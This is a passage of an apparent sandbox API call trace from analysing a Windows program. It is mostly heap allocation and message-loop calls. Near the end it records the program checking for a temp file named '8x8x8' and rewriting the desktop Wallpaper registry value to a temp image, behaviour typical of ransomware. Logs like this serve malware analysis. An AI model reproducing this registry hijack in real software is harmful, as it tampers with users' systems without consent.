dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0292.248] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0292.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0292.249] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0292.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0292.249] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0292.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0292.249] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0292.249] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f157f0 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0292.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0292.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0292.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0292.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0292.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0292.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0292.251] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0292.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0292.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0292.251] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0292.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0292.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0292.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0292.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0292.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0292.251] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0292.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0292.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0292.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0292.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0292.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0292.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0292.251] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0292.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0292.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0292.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0292.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0292.251] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0292.251] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0292.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0292.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0292.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0292.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0292.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0292.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0292.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0292.252] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0292.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0292.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0292.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0292.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0292.252] timeGetTime () returned 0x1189241 [0292.252] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0292.252] Sleep (dwMilliseconds=0xa) [0292.324] timeGetTime () returned 0x118928a [0292.324] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0292.325] Sleep (dwMilliseconds=0xa) [0292.510] timeGetTime () returned 0x1189344 [0292.510] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0292.511] Sleep (dwMilliseconds=0xa) [0292.596] timeGetTime () returned 0x118939a [0292.597] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0292.597] Sleep (dwMilliseconds=0xa) [0292.668] timeGetTime () returned 0x11893e2 [0292.668] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0292.668] Sleep (dwMilliseconds=0xa) [0292.753] timeGetTime () returned 0x1189436 [0292.753] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0292.753] Sleep (dwMilliseconds=0xa) [0292.828] timeGetTime () returned 0x1189481 [0292.828] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0292.828] Sleep (dwMilliseconds=0xa) [0292.873] timeGetTime () returned 0x11894ae [0292.873] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0292.873] Sleep (dwMilliseconds=0xa) [0292.908] timeGetTime () returned 0x11894d1 [0292.908] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0292.908] Sleep (dwMilliseconds=0xa) [0292.982] timeGetTime () returned 0x118951b [0292.982] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0292.982] TranslateMessage (lpMsg=0x8cf798) returned 0 [0292.982] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0292.982] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0292.982] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0292.982] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0292.983] Sleep (dwMilliseconds=0xa) [0293.065] timeGetTime () returned 0x118956e [0293.066] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0293.066] Sleep (dwMilliseconds=0xa) [0293.122] timeGetTime () returned 0x11895a8 [0293.122] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0293.122] Sleep (dwMilliseconds=0xa) [0293.199] timeGetTime () returned 0x11895f5 [0293.200] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0293.200] Sleep (dwMilliseconds=0xa) [0293.246] timeGetTime () returned 0x1189623 [0293.246] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0293.246] Sleep (dwMilliseconds=0xa) [0293.291] timeGetTime () returned 0x1189651 [0293.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0293.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0293.292] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0293.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0293.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0293.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0293.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0293.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0293.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0293.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0293.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0293.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0293.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0293.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0293.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0293.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0293.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0293.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0293.293] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0293.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0293.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0293.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0293.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0293.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0293.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0293.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0293.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0293.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0293.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0293.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0293.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0293.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0293.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0293.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0293.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0293.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0293.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0293.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0293.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0293.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0293.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0293.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0293.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0293.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0293.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0293.294] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0293.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0293.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0293.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0293.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0293.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0293.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0293.295] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0293.295] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0293.295] RegCloseKey (hKey=0x2d0) returned 0x0 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0293.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0293.297] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0293.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0293.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0293.297] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0293.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0293.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0293.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0293.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0293.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0293.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0293.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0293.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0293.297] 